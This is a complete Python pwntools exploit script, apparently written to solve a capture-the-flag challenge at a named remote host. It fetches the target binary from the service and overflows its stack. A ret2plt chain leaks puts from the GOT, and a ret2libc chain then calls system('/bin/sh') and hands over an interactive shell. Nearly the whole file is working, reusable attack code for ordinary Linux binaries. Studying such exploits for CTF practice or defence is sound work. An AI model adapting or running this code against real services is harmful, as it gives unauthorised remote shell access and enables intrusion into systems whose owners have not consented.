from pwn import *
import base64
from os import path
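# --- Exploit flow ---------------------------------------------------------
# 1. connect and save the target binary the service sends as a base64 blob
# 2. wait for a sibling step (not in this file) to write ``vars``:
#    "<overflow offset>;<address of main, hex>"
# 3. ret2plt: overflow once to print puts@GOT via puts@PLT, then return to main
# 4. ret2libc: compute libc base from the leak and call system("/bin/sh")
#
# SECURITY NOTE: the binary comes from an untrusted remote peer.  This script
# only *parses* it (pwntools ELF/ROP); never execute it on your host outside a
# sandbox/VM.  For local testing swap remote(...) in main() for
# process('./binary') -- inside such a sandbox.
#
# Written to run under both Python 2 (the original dialect) and Python 3:
# all protocol data is handled as bytes.

HOST = 'challs.xmas.htsp.ro'
PORT = 12002
LIBC_PATH = 'libc-2.27.so'   # must be the remote's libc, otherwise symbol offsets are wrong
BINARY_PATH = 'binary'
VARS_PATH = 'vars'


def _fetch_binary(conn, out_path=BINARY_PATH):
    """Read the base64-encoded target from the service banner and write it to disk.

    The service prints the blob as a Python bytes repr (``b'...'``).  Both
    delimiters are consumed here; the closing quote is dropped so it never
    reaches b64decode (the original relied on b64decode silently ignoring it).

    Returns the path the binary was written to.
    """
    banner = conn.recvuntil(b"b'")
    print(banner)
    blob = conn.recvuntil(b"'", drop=True)
    with open(out_path, 'wb') as fh:
        fh.write(base64.b64decode(blob))
    return out_path


def _gadget(rop, insns):
    """Return the address of the first gadget in *rop* matching *insns*.

    ROP.find_gadget returns None when nothing matches; indexing None would
    raise an unhelpful TypeError, so fail naming the gadget we wanted.
    """
    found = rop.find_gadget(insns)
    if found is None:
        raise RuntimeError('gadget not found in binary: %s' % '; '.join(insns))
    return found[0]   # index 0 of a pwntools Gadget is its address


def _read_vars(vars_path=VARS_PATH, poll=0.5):
    """Block until *vars_path* exists, then return ``(offset, main_addr)``.

    The file is produced by a separate step and holds ``<offset>;<main hex>``.
    ``offset`` is the number of padding bytes placed before the 8-byte word
    that precedes the return address (presumably the distance to the saved
    rbp -- this is whatever the producer computed).  There is deliberately no
    timeout: interrupt with Ctrl-C if the producer never runs.

    Raises ValueError/IndexError if the file does not have two ';'-separated
    fields in the expected radix.
    """
    while not path.exists(vars_path):
        sleep(poll)
    with open(vars_path, 'r') as fh:
        fields = fh.read().split(';')
    return int(fields[0]), int(fields[1], 16)


def _overflow(offset, chain):
    """Build the stack-smash payload: padding, one 8-byte filler, then *chain*.

    The filler (zero) occupies the word between the padding and the first
    return address; its value is never dereferenced by the chains used here.
    """
    return b'A' * offset + p64(0) + b''.join(p64(addr) for addr in chain)


def _leak_puts(conn, elf, pop_rdi_ret, main_addr, offset):
    """First round: print puts@GOT through puts@PLT, then return to main.

    Returns the leaked runtime address of puts.  The service echoes two lines
    before the leak (behaviour baked into the original; adjust if the prompt
    changes).  The leak is zero-extended with ljust rather than by appending
    exactly two NUL bytes, so a 5- or 6-byte line does not misalign u64.

    Raises ValueError if the leaked line is empty or longer than 8 bytes.
    """
    payload = _overflow(offset, [pop_rdi_ret, elf.got['puts'], elf.plt['puts'], main_addr])
    conn.sendlineafter(b'? ', payload)
    print(conn.recvline())
    print(conn.recvline())
    leak = conn.recvline().rstrip(b'\n')
    if not leak or len(leak) > 8:
        raise ValueError('unexpected puts leak: %r' % (leak,))
    return u64(leak.ljust(8, b'\x00'))


def _spawn_shell(conn, libc, libc_base, ret, pop_rdi_ret, offset):
    """Second round: system("/bin/sh") via ret2libc, then hand over the tty.

    The bare ``ret`` before ``pop rdi`` is kept from the original; it is
    presumably there to re-align the stack to 16 bytes before system()
    (glibc's system() faults on a misaligned stack) -- confirm if changing.
    """
    system = libc_base + libc.symbols['system']
    log.info('system: {}'.format(hex(system)))
    binsh = libc_base + next(libc.search(b'/bin/sh'))
    log.info('/bin/sh: {}'.format(hex(binsh)))
    payload = _overflow(offset, [ret, pop_rdi_ret, binsh, system])
    conn.sendlineafter(b'? ', payload)
    conn.interactive()


def main():
    """Run the full exploit against HOST:PORT (see the flow comment above)."""
    conn = remote(HOST, PORT)
    binary_path = _fetch_binary(conn)

    libc = ELF(LIBC_PATH)
    elf = ELF(binary_path)   # parse only -- see the security note above
    rop = ROP(elf)
    pop_rdi_ret = _gadget(rop, ['pop rdi', 'ret'])
    ret = _gadget(rop, ['ret'])

    offset, main_addr = _read_vars()

    puts_addr = _leak_puts(conn, elf, pop_rdi_ret, main_addr, offset)
    log.info('puts: {}'.format(hex(puts_addr)))
    libc_base = puts_addr - libc.symbols['puts']
    log.info('libc_base: {}'.format(hex(libc_base)))

    _spawn_shell(conn, libc, libc_base, ret, pop_rdi_ret, offset)


if __name__ == '__main__':
    main()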